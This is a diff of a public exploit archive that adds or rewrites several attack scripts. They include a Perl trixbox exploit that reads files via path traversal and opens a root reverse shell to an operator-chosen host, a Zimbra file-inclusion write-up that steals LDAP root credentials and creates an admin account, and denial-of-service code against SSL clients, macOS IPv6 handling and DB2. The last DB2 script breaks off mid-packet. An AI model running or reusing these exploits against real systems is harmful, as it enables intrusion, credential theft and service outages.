HTTP::Request->new(POST => $url); - $req->content_type('application/x-www-form-urlencoded'); - $req->content($postData); - my $res = $ua->request($req); - my $content = $res->content; - return $content; -} - -sub readFile{ - my $file = shift; - my $content = post("langChoice=../../../../../../../../../..$file%00"); - my @fileLines = split(/\n/,$content); - my $fileContent = "Content of $file: \n\n"; - for(my $i=3;$i<@fileLines;$i++){ - last if($fileLines[$i] =~ m/trixbox - User Mode/); - $fileContent = $fileContent . $fileLines[$i-3] . "\n"; - } - return $fileContent; -} - -sub tcp_reverse_shell{ - my $rhost= shift; - my $rport = shift; - my $uid = shift; - my $rshell; - if($uid eq "asterisk"){ - $rshell = "langChoice=%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec({\"/bin/sh\"} (\"JMB\", \"-i\"));'`;?>%00"; - - }else{ - $rshell = "langChoice=%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/usr/bin/sudo\",\"/bin/bash\", (\"-i\"));'`;?>%00"; - } - execScript($rshell); -} - - -sub extractPHPSID{ - $_ = shift; - if(/PHPSESSID=(\w+)/){ - return $1; - } -} - -sub menu{ - print < Remote TCP shell - 2> Read local file -EOF - my $option = ; - chop($option); - switch($option){ - case 1 { - print "Host and port the reverse shell should connect to ? "; - print "(:): "; - my $hp=; - chop($hp); - print "Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]"; - my $uid=; - chop($uid); - my($rhost,$rport) = split(/:/,$hp); - print "Make sure you've opened a server socket on port $rport at $rhost (e.g, nc -l -p $rport)\n"; - print "Press enter to continue..."; - ; - tcp_reverse_shell($rhost,$rport,$uid); - print "done...\n"; - } - case 2 { - while(1){ - print "Full path (e.g. /etc/passwd): "; - my $file = ; - chop($file); - print readFile($file) . "\n\n"; - } - } - } -} - -sub usage{ - print "./trixbox_fi.pl \n"; - exit 1; -} - -# milw0rm.com [2008-07-09] +#!/usr/bin/perl -w + +# Jean-Michel BESNARD / LEXSI Audit +# 2008-07-09 +# This is an update of the previous exploit. We can now get a root shell, thanks to sudo. +# +# perl trixbox_fi_v2.pl 192.168.1.212 +# Please listen carefully as our menu option has changed +# Choose from the following options: +# 1> Remote TCP shell +# 2> Read local file +# 1 +# Host and port the reverse shell should connect to ? (:): 192.168.1.132:4444 +# Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk] +# root +# Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444) +# Press enter to continue... +# done... + +# nc -l -v -p 4444 +# listening on [any] 4444 ... +# connect to [192.168.1.132] from lexsi-abo-new.lexsi.com [192.168.1.212] 48397 +# bash: no job control in this shell +# bash-3.1# id +# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) +# bash-3.1# + + +use strict; +use Switch; +use LWP::UserAgent; +use HTTP::Cookies; + +usage() unless @ARGV; +my $url = "http://$ARGV[0]/user/index.php"; +my $ua = LWP::UserAgent->new; +my $cookie_jar = HTTP::Cookies->new; +$ua->cookie_jar($cookie_jar); + +menu(); + +sub execScript{ + my $scriptCode = shift; + post($scriptCode); + my $phpsessionid = extractPHPSID($cookie_jar->as_string); + post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00"); +} + +sub post{ + my $postData = shift; + my $req = HTTP::Request->new(POST => $url); + $req->content_type('application/x-www-form-urlencoded'); + $req->content($postData); + my $res = $ua->request($req); + my $content = $res->content; + return $content; +} + +sub readFile{ + my $file = shift; + my $content = post("langChoice=../../../../../../../../../..$file%00"); + my @fileLines = split(/\n/,$content); + my $fileContent = "Content of $file: \n\n"; + for(my $i=3;$i<@fileLines;$i++){ + last if($fileLines[$i] =~ m/trixbox - User Mode/); + $fileContent = $fileContent . $fileLines[$i-3] . "\n"; + } + return $fileContent; +} + +sub tcp_reverse_shell{ + my $rhost= shift; + my $rport = shift; + my $uid = shift; + my $rshell; + if($uid eq "asterisk"){ + $rshell = "langChoice=%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec({\"/bin/sh\"} (\"JMB\", \"-i\"));'`;?>%00"; + + }else{ + $rshell = "langChoice=%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/usr/bin/sudo\",\"/bin/bash\", (\"-i\"));'`;?>%00"; + } + execScript($rshell); +} + + +sub extractPHPSID{ + $_ = shift; + if(/PHPSESSID=(\w+)/){ + return $1; + } +} + +sub menu{ + print < Remote TCP shell + 2> Read local file +EOF + my $option = ; + chop($option); + switch($option){ + case 1 { + print "Host and port the reverse shell should connect to ? "; + print "(:): "; + my $hp=; + chop($hp); + print "Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]"; + my $uid=; + chop($uid); + my($rhost,$rport) = split(/:/,$hp); + print "Make sure you've opened a server socket on port $rport at $rhost (e.g, nc -l -p $rport)\n"; + print "Press enter to continue..."; + ; + tcp_reverse_shell($rhost,$rport,$uid); + print "done...\n"; + } + case 2 { + while(1){ + print "Full path (e.g. /etc/passwd): "; + my $file = ; + chop($file); + print readFile($file) . "\n\n"; + } + } + } +} + +sub usage{ + print "./trixbox_fi.pl \n"; + exit 1; +} + +# milw0rm.com [2008-07-09] diff --git a/platforms/linux/remote/764.c b/platforms/linux/remote/764.c index 4448241ba..5965e8818 100755 --- a/platforms/linux/remote/764.c +++ b/platforms/linux/remote/764.c @@ -1289,6 +1289,6 @@ int main(int argc, char* argv[]) close(ssl1->sock); return 0; } -/* spabam: It isn't 0day */ - -// milw0rm.com [2003-04-04] +/* spabam: It isn't 0day */ + +// milw0rm.com [2003-04-04] diff --git a/platforms/linux/webapps/30085.txt b/platforms/linux/webapps/30085.txt new file mode 100755 index 000000000..cb880842f --- /dev/null +++ b/platforms/linux/webapps/30085.txt @@ -0,0 +1,59 @@ +# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI +# Date: 06 Dec 2013 +# Exploit Author: rubina119 +# Contact Email : rubina119[at]gmail.com +# Vendor Homepage: http://www.zimbra.com/ +# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected, +# Tested on: Centos(x), Ubuntu. +# CVE : No CVE, no patch just 0Day +# State : Critical + +# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip + +---------------Description----------------- + +This script exploits a Local File Inclusion in +/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz +which allows us to see localconfig.xml +that contains LDAP root credentials wich allow us to make requests in +/service/admin/soap API with the stolen LDAP credentials to create user +with administration privlegies +and gain acces to the Administration Console. + +LFI is located at : +/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 + +Example : + +https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 + +or + +https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 + + +----------------Exploit----------------- + + +Before use this exploit, target server must have admin console port open +"7071" otherwise it won't work. + +use the exploit like this : + + +ruby run.rb -t mail.example.com -u someuser -p Test123_23 + +[*] Looking if host is vuln.... +[+] Host is vuln exploiting... +[+] Obtaining Domain Name +[+] Creating Account +[+] Elevating Privileges +[+] Login Credentials + [*] Login URL : https://mail.example.com:7071/zimbraAdmin/ + [*] Account : someuser@example.com + [*] Password : Test123_23 +[+] Successfully Exploited ! + +The number of servers vuln are huge like 80/100. + +This is only for educational purpouses. \ No newline at end of file diff --git a/platforms/multiple/dos/4773.pl b/platforms/multiple/dos/4773.pl index 68782e0aa..8b7eed69f 100755 --- a/platforms/multiple/dos/4773.pl +++ b/platforms/multiple/dos/4773.pl @@ -1,55 +1,55 @@ -#!/usr/bin/perl -# Copyright(c) Beyond Security -# Written by Noam Rathaus - based on beSTORM's SSL Server module -# Exploits vulnerability CVE-2006-4343 - where the SSL client can be crashed by special SSL serverhello response - -use strict; -use IO::Socket; -my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp', Listen => 1, Reuse => 1, ); -die "Could not create socket: $!\n" unless $sock; - -my $TIMEOUT = 0.5; -my $line; -my $new_sock; -srand(time()); - -while ( $new_sock = $sock->accept() ) -{ - printf ("new connection\n"); - my $rin; - my $line; - my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) && recv($new_sock, $line, 1024, undef); - - my $ciphers = ""; - my $ciphers_length = pack('n', length($ciphers)); - - my $certificate = ""; - my $certificate_length = pack('n', length($certificate)); - - my $packet_sslv2 = -"\x04". -"\x01". # Hit (default 0x01) - -"\x00". # No certificate - -"\x00\x02". -$certificate_length. -$ciphers_length. -"\x00\x10". -# Certificate -$certificate. -# Done -# Ciphers -$ciphers. -# Done -"\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9"; - - my $ssl_length = pack('n', length($packet_sslv2) + 0x8000); - $packet_sslv2 = $ssl_length . $packet_sslv2; - - print $new_sock $packet_sslv2; - - close($new_sock); -} - -# milw0rm.com [2007-12-23] +#!/usr/bin/perl +# Copyright(c) Beyond Security +# Written by Noam Rathaus - based on beSTORM's SSL Server module +# Exploits vulnerability CVE-2006-4343 - where the SSL client can be crashed by special SSL serverhello response + +use strict; +use IO::Socket; +my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp', Listen => 1, Reuse => 1, ); +die "Could not create socket: $!\n" unless $sock; + +my $TIMEOUT = 0.5; +my $line; +my $new_sock; +srand(time()); + +while ( $new_sock = $sock->accept() ) +{ + printf ("new connection\n"); + my $rin; + my $line; + my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) && recv($new_sock, $line, 1024, undef); + + my $ciphers = ""; + my $ciphers_length = pack('n', length($ciphers)); + + my $certificate = ""; + my $certificate_length = pack('n', length($certificate)); + + my $packet_sslv2 = +"\x04". +"\x01". # Hit (default 0x01) + +"\x00". # No certificate + +"\x00\x02". +$certificate_length. +$ciphers_length. +"\x00\x10". +# Certificate +$certificate. +# Done +# Ciphers +$ciphers. +# Done +"\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9"; + + my $ssl_length = pack('n', length($packet_sslv2) + 0x8000); + $packet_sslv2 = $ssl_length . $packet_sslv2; + + print $new_sock $packet_sslv2; + + close($new_sock); +} + +# milw0rm.com [2007-12-23] diff --git a/platforms/multiple/dos/5191.c b/platforms/multiple/dos/5191.c index 667290d62..dc0ee4a0a 100755 --- a/platforms/multiple/dos/5191.c +++ b/platforms/multiple/dos/5191.c @@ -1,143 +1,143 @@ -/* xnu-ipv6-ipcomp.c - * - * Copyright (c) 2008 by - * - * Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS POC - * by mu-b - Sun 24 Feb 2008 - * - * - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386) - * Apple MACOS X 10.5.2 (xnu-1228.3.13~1/RELEASE_I386) - * - * ipcomp6_input does not verify the success of the first call - * to m_pulldown (m -> md typo?). - * - * md = m_pulldown(m, off, sizeof(*ipcomp), NULL); - * if (!m) { - * -> - * md = m_pulldown(m, off, sizeof(*ipcomp), NULL); - * if (!md) { - * (bsd/netinet6/ipcomp_input.c) - * - * curiosly the same bug exists in ipcomp4_input, but an explicit - * check is made to ensure there is enough space for the struct ipcomp. - * - * Note: bug independently found by Shoichi Sakane of the KAME project. - * (FreeBSD 5.5, 4.9.0 & NetBSD 3.1 also vulnerable) - * (http://www.kb.cert.org/vuls/id/110947) - * (http://www.securityfocus.com/bid/27642) - * (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0177) - * - * - Private Source Code -DO NOT DISTRIBUTE - - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! - */ - -#include -#include - -#include -#include -#include -#include -#include -#include -#include - -#define IPV6_INTERFACE "eth0" -#define IPV6_SRC_OFFSET 8 -#define IPV6_DST_OFFSET 24 - -#define HAMMER_NUM 8 - -static unsigned char pbuf[] = - "\x60" - "\x00\x00\x00" - "\x00\x00" /* plen = 0 */ - "\x6c" /* nxt_hdr = IPComp */ - "\x66" - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; - -static int -get_localip (char *if_name, unsigned int *ip6_addr) -{ - struct ifaddrs *ifa_head; - int result; - - result = -1; - if (getifaddrs (&ifa_head) == 0) - { - struct ifaddrs *ifa_cur; - - ifa_cur = ifa_head; - for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next) - { - if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL) - { - if (strcmp (if_name, (char *) ifa_cur->ifa_name) != 0 || - ifa_cur->ifa_addr->sa_family != AF_INET6 || - !(ifa_cur->ifa_flags & IFF_UP)) - continue; - - memcpy (ip6_addr, - &(((struct sockaddr_in6 *) ifa_cur->ifa_addr)->sin6_addr), - sizeof (int) * 4); - result = 0; - break; - } - } - - freeifaddrs (ifa_head); - } - - return (result); -} - -int -main (int argc, char **argv) -{ - char errbuf[LIBNET_ERRBUF_SIZE], ip6_buf[128]; - unsigned int i, ip6_addr[4]; - libnet_t *lnsock; - - printf ("Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS PoC\n" - "by: \n" - "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); - - if (argc < 2) - { - fprintf (stderr, "Usage: %s \n", argv[0]); - exit (EXIT_FAILURE); - } - - if (get_localip (IPV6_INTERFACE, - (unsigned int *) &pbuf[IPV6_SRC_OFFSET]) < 0) - { - fprintf (stderr, "* get_localip() failed\n"); - exit (EXIT_FAILURE); - } - - if (inet_pton (AF_INET6, argv[1], ip6_addr) <= 0) - { - fprintf (stderr, "* inet_pton() failed\n"); - exit (EXIT_FAILURE); - } - memcpy (&pbuf[IPV6_DST_OFFSET], ip6_addr, sizeof ip6_addr); - - lnsock = libnet_init (LIBNET_RAW6_ADV, NULL, errbuf); - if (lnsock == NULL) - { - fprintf (stderr, "* libnet_init() failed: %s\n", errbuf); - exit (EXIT_FAILURE); - } - - inet_ntop (AF_INET6, &pbuf[IPV6_SRC_OFFSET], ip6_buf, sizeof ip6_buf); - printf ("* local ipv6 %s...\n", ip6_buf); - printf ("* attacking %s...", argv[1]); - for (i = 0; i < HAMMER_NUM; i++) - libnet_write_raw_ipv6 (lnsock, pbuf, sizeof pbuf - 1); - printf ("done\n"); - - return (EXIT_SUCCESS); -} - -// milw0rm.com [2008-02-26] +/* xnu-ipv6-ipcomp.c + * + * Copyright (c) 2008 by + * + * Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS POC + * by mu-b - Sun 24 Feb 2008 + * + * - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386) + * Apple MACOS X 10.5.2 (xnu-1228.3.13~1/RELEASE_I386) + * + * ipcomp6_input does not verify the success of the first call + * to m_pulldown (m -> md typo?). + * + * md = m_pulldown(m, off, sizeof(*ipcomp), NULL); + * if (!m) { + * -> + * md = m_pulldown(m, off, sizeof(*ipcomp), NULL); + * if (!md) { + * (bsd/netinet6/ipcomp_input.c) + * + * curiosly the same bug exists in ipcomp4_input, but an explicit + * check is made to ensure there is enough space for the struct ipcomp. + * + * Note: bug independently found by Shoichi Sakane of the KAME project. + * (FreeBSD 5.5, 4.9.0 & NetBSD 3.1 also vulnerable) + * (http://www.kb.cert.org/vuls/id/110947) + * (http://www.securityfocus.com/bid/27642) + * (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0177) + * + * - Private Source Code -DO NOT DISTRIBUTE - + * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! + */ + +#include +#include + +#include +#include +#include +#include +#include +#include +#include + +#define IPV6_INTERFACE "eth0" +#define IPV6_SRC_OFFSET 8 +#define IPV6_DST_OFFSET 24 + +#define HAMMER_NUM 8 + +static unsigned char pbuf[] = + "\x60" + "\x00\x00\x00" + "\x00\x00" /* plen = 0 */ + "\x6c" /* nxt_hdr = IPComp */ + "\x66" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; + +static int +get_localip (char *if_name, unsigned int *ip6_addr) +{ + struct ifaddrs *ifa_head; + int result; + + result = -1; + if (getifaddrs (&ifa_head) == 0) + { + struct ifaddrs *ifa_cur; + + ifa_cur = ifa_head; + for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next) + { + if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL) + { + if (strcmp (if_name, (char *) ifa_cur->ifa_name) != 0 || + ifa_cur->ifa_addr->sa_family != AF_INET6 || + !(ifa_cur->ifa_flags & IFF_UP)) + continue; + + memcpy (ip6_addr, + &(((struct sockaddr_in6 *) ifa_cur->ifa_addr)->sin6_addr), + sizeof (int) * 4); + result = 0; + break; + } + } + + freeifaddrs (ifa_head); + } + + return (result); +} + +int +main (int argc, char **argv) +{ + char errbuf[LIBNET_ERRBUF_SIZE], ip6_buf[128]; + unsigned int i, ip6_addr[4]; + libnet_t *lnsock; + + printf ("Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS PoC\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); + + if (argc < 2) + { + fprintf (stderr, "Usage: %s \n", argv[0]); + exit (EXIT_FAILURE); + } + + if (get_localip (IPV6_INTERFACE, + (unsigned int *) &pbuf[IPV6_SRC_OFFSET]) < 0) + { + fprintf (stderr, "* get_localip() failed\n"); + exit (EXIT_FAILURE); + } + + if (inet_pton (AF_INET6, argv[1], ip6_addr) <= 0) + { + fprintf (stderr, "* inet_pton() failed\n"); + exit (EXIT_FAILURE); + } + memcpy (&pbuf[IPV6_DST_OFFSET], ip6_addr, sizeof ip6_addr); + + lnsock = libnet_init (LIBNET_RAW6_ADV, NULL, errbuf); + if (lnsock == NULL) + { + fprintf (stderr, "* libnet_init() failed: %s\n", errbuf); + exit (EXIT_FAILURE); + } + + inet_ntop (AF_INET6, &pbuf[IPV6_SRC_OFFSET], ip6_buf, sizeof ip6_buf); + printf ("* local ipv6 %s...\n", ip6_buf); + printf ("* attacking %s...", argv[1]); + for (i = 0; i < HAMMER_NUM; i++) + libnet_write_raw_ipv6 (lnsock, pbuf, sizeof pbuf - 1); + printf ("done\n"); + + return (EXIT_SUCCESS); +} + +// milw0rm.com [2008-02-26] diff --git a/platforms/multiple/dos/8344.py b/platforms/multiple/dos/8344.py index d63d64cdf..4579fa700 100755 --- a/platforms/multiple/dos/8344.py +++ b/platforms/multiple/dos/8344.py @@ -1,33 +1,33 @@ -# Discovered by Dennis Yurichev - -# DB2TEST database should be present on target system - -from sys import * -from socket import * - -sockobj = socket(AF_INET, SOCK_STREAM) - -sockobj.connect ((argv[1], 50000)) - -sockobj.send( -"\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8" -"\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40" -"\x40\x40\xF0\xF1\xC3\xF4\xF0\xF1\xF1\xF8\xF0\xF0\xF0\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0" -"\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" -"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" -"\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40" -"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00" -"\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00" -"\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D" -"\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A" -"\xD0\x01\x00\x02\x00\x44\x10\x6E\x00\x06\x11\xA2\x00\x09\x00\x16" -"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40" -"\x40\x40\x40\x40\x00\x24\x11\xDC\x6F\xC1\x3B\xD4\x3C\x33\xF8\x0C" -"\xC9\x96\x6E\x6C\xCD\xB9\x0A\x2C\x9C\xEC\x49\x2A\x1A\x4D\xCE\x62" -"\x47\x9D\x37\x88\xA8\x77\x23\x43") - -sockobj.close() - -# milw0rm.com [2009-04-03] +# Discovered by Dennis Yurichev + +# DB2TEST database should be present on target system + +from sys import * +from socket import * + +sockobj = socket(AF_INET, SOCK_STREAM) + +sockobj.connect ((argv[1], 50000)) + +sockobj.send( +"\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8" +"\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40" +"\x40\x40\xF0\xF1\xC3\xF4\xF0\xF1\xF1\xF8\xF0\xF0\xF0\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0" +"\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" +"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" +"\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40" +"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00" +"\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00" +"\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D" +"\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A" +"\xD0\x01\x00\x02\x00\x44\x10\x6E\x00\x06\x11\xA2\x00\x09\x00\x16" +"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40" +"\x40\x40\x40\x40\x00\x24\x11\xDC\x6F\xC1\x3B\xD4\x3C\x33\xF8\x0C" +"\xC9\x96\x6E\x6C\xCD\xB9\x0A\x2C\x9C\xEC\x49\x2A\x1A\x4D\xCE\x62" +"\x47\x9D\x37\x88\xA8\x77\x23\x43") + +sockobj.close() + +# milw0rm.com [2009-04-03] diff --git a/platforms/multiple/dos/8345.py b/platforms/multiple/dos/8345.py index ec291da5d..3720d354f 100755 --- a/platforms/multiple/dos/8345.py +++ b/platforms/multiple/dos/8345.py @@ -1,90 +1,90 @@ -# Discovered by Dennis Yurichev - -# DB2TEST database should be present on target system -# GUEST account with QQ password shoule be present on target system - -from sys import * -from socket import * - -sockobj = socket(AF_INET, SOCK_STREAM) - -sockobj.connect ((argv[1], 50000)) - -sockobj.send( -"\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8" -"\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40" -"\x40\x40\xF0\xF1\xC2\xF4\xF0\xF3\xC2\xF8\xF0\xF0\xF0\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0" -"\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" -"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" -"\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40" -"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00" -"\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00" -"\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D" -"\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A" -"\xD0\x01\x00\x02\x00\x44\x10\x6D\x00\x06\x11\xA2\x00\x09\x00\x16" -"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40" -"\x40\x40\x40\x40\x00\x24\x11\xDC\x71\x71\x99\xA7\xDF\xD5\x8F\x18" -"\x45\x96\xD6\x07\x08\x8D\xDC\x60\x4F\xFA\xE6\x37\x4D\x6A\x62\xAB" -"\x0C\xE1\x00\xAB\xA3\xD5\x32\x3E" -) - -data=sockobj.recv(102400) - -sockobj.send( -"\x00\x26\xD0\x41\x00\x01\x00\x20\x10\x6D\x00\x06\x11\xA2\x00\x03" -"\x00\x16\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40" -"\x40\x40\x40\x40\x40\x40\x00\x35\xD0\x41\x00\x02\x00\x2F\x10\x6E" -"\x00\x06\x11\xA2\x00\x03\x00\x16\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2" -"\xE3\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x06\x11\xA1" -"\x98\x98\x00\x09\x11\xA0\x87\xA4\x85\xA2\xA3\x00\xBF\xD0\x01\x00" -"\x03\x00\xB9\x20\x01\x00\x06\x21\x0F\x24\x07\x00\x23\x21\x35\xF1" -"\xF9\xF2\x4B\xF1\xF6\xF8\x4B\xF0\x4B\xF1\xF0\xF8\x4B\xF3\xF5\xF3" -"\xF3\xF3\x4B\xF0\xF8\xF1\xF0\xF2\xF3\xF1\xF6\xF0\xF8\xF1\x00\x16" -"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40" -"\x40\x40\x40\x40\x00\x0C\x11\x2E\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0" -"\x00\x0D\x00\x2F\xD8\xE3\xC4\xE2\xD8\xD3\xE7\xF8\xF6\x00\x1C\x00" -"\x35\x00\x06\x11\x9C\x04\xE4\x00\x06\x11\x9D\x04\xB0\x00\x06\x11" -"\x9E\x04\xE4\x00\x06\x19\x13\x04\xB8\x00\x3C\x21\x04\x37\xE2\xD8" -"\xD3\xF0\xF9\xF0\xF5\xF0\xD5\xE3\x40\x40\x40\x40\x40\x40\x40\x40" -"\x40\x40\x40\x40\x40\x40\x40\x40\x97\xA8\xA3\x88\x96\x95\x4B\x85" -"\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x87\xA4\x85\xA2" -"\xA3\x40\x40\x40\x00\x00\x05\x21\x3B\xF1" -) - -data=sockobj.recv(102400) - -sockobj.send( -"\x00\x12\xD0\x41\x00\x01\x00\x0C\x10\x41\x00\x08\x14\x04\x14\xCC" -"\x04\xE4\x00\x4E\xD0\x51\x00\x02\x00\x48\x20\x14\x00\x44\x21\x13" -"\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20\x20\x20\x20" -"\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20\x20\x20\x20" -"\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20\x20\x20\x20" -"\x20\x20\x20\x20\x20\x20\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01" -"\x00\x35\xD0\x74\x00\x02\x00\x2F\x24\x14\x00\x00\x00\x00\x25\x53" -"\x45\x54\x20\x43\x55\x52\x52\x45\x4E\x54\x20\x4C\x4F\x43\x41\x4C" -"\x45\x20\x4C\x43\x5F\x43\x54\x59\x50\x45\x20\x3D\x20\x27\x65\x6E" -"\x5F\x55\x53\x27\xFF\x00\x53\xD0\x51\x00\x03\x00\x4D\x20\x0D\x00" -"\x44\x21\x13\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20" -"\x20\x20\x20\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20" -"\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20" -"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x4C\x56\x4C\x30" -"\x31\x00\x04\x00\x05\x21\x16\xF1\x00\x1A\xD0\x53\x00\x03\x00\x14" 